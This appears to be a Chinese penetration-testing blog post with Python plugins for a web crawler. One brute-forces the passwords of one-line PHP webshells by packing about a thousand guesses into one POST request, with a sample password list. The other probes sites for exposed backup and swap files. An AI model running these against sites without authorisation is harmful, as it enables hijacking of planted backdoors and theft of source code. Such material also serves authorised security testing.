MENU

基于爬虫开发 WebShell 爆破插件与备份扫描

February 2, 2019 • Read: 4922 • 渗透测试阅读设置

参考文章:秒爆十万字典:奇葩技巧快速枚举 “一句话后门” 密码

这篇文章提供一个方法可以快速爆破 WebShell 的 1000 个密码,利用这个思路,我们的 WebShell 爆破插件将可以很快检测,不需要多少时间

代码编写展开目录

上面的文章需要反复看,看懂了再看下面的代码。在 script 目录中新建 webshell_check.py 文件

  • # __author__ = 'mathor'
  • # Blast the end of every.php file with one sentence
  • import sys, os
  • from lib.core.Download import Downloader
  • filename = os.path.join(sys.path[0], 'data', 'web_shell.dic')
  • payload = []
  • f = open(filename)
  • a = 0
  • for i in f:
  • payload.append(i.strip())
  • a += 1
  • if (a == 999):
  • break
  • class spider:
  • def run(self, url, html):
  • if (not url.endswith('.php')):
  • return False
  • print("[WebShell check:]", url)
  • post_data = {}
  • for _payload in payload:
  • post_data[_payload] = 'echo "password is %s";' % _payload
  • r = Downloader.post(url, post_data)
  • if r:
  • print("webshell:%s" % r)
  • return True
  • return False

字典文件随意找个 top1000 弱密码放到 data 目录中,命名为 web_shell.dic

  • 1
  • 2
  • 3
  • 4
  • 5
  • 6
  • 7
  • 8
  • 9
  • 10
  • 404
  • data
  • tools
  • index0
  • sh3ll
  • shell
  • shel
  • she
  • shell1
  • shell99
  • root
  • rootshell
  • bypass
  • anonym0us
  • anonymous
  • shellnymous
  • fuck
  • system
  • a
  • b
  • c
  • abc
  • d
  • e
  • f
  • g
  • h
  • i
  • j
  • k
  • l
  • m
  • n
  • o
  • p
  • y
  • z
  • webshell
  • hack
  • h4ck

基于爬虫的备份扫描器展开目录

已经有前辈为我们造好了轮子:https://github.com/secfree/bcrpscan

我们只需要修改其中生成路径的部分,使输入一个网站路径就可以得出备份文件地址。在 script 目录下新建 bak_check.py

  • # __author__ = 'mathor'
  • import sys, os
  • from lib.core.Download import Downloader
  • from urllib.parse import urlparse
  • DIR_PROBE_EXTS = ['.tar.gz', '.zip', '.rar', '.tar.gz2']
  • FILE_PROBE_EXTS = ['.bak', '.swp', '.1']
  • download = Downloader()
  • def get_parent_paths(path):
  • paths = []
  • if not path or path[0] != '/':
  • return paths
  • paths.append(path)
  • tph = path
  • if path[-1] == '/':
  • tph = path[:-1]
  • while tph:
  • tph = tph[:tph.rfind('/') + 1]
  • paths.append(tph)
  • tph = tph[:-1]
  • return paths
  • class spider:
  • def run(self, url, html):
  • pr = urlparse(url)
  • paths = get_parent_paths(pr.path)
  • web_paths = []
  • for p in paths:
  • if p == '/':
  • for ext in DIR_PROBE_EXTS:
  • u = '%s://%s%s%s' % (pr.scheme, pr.netloc, p, pr.netloc + ext)
  • else:
  • if p[-1] == '/':
  • for ext in DIR_PROBE_EXTS:
  • u = '%s://%s%s%s' % (pr.scheme, pr.netloc, p[:-1], ext)
  • else:
  • for ext in FILE_PROBE_EXTS:
  • u = '%s://%s%s%s' % (pr.scheme, pr.netloc, p, ext)
  • web_paths.append(u)
  • for path in web_paths:
  • print("[web path]:%s" % path)
  • if (download.get(path) is not None):
  • print("[+] bak file has found: %s" % path)
  • return False

Archives Tip
QR Code for this page
Tipping QR Code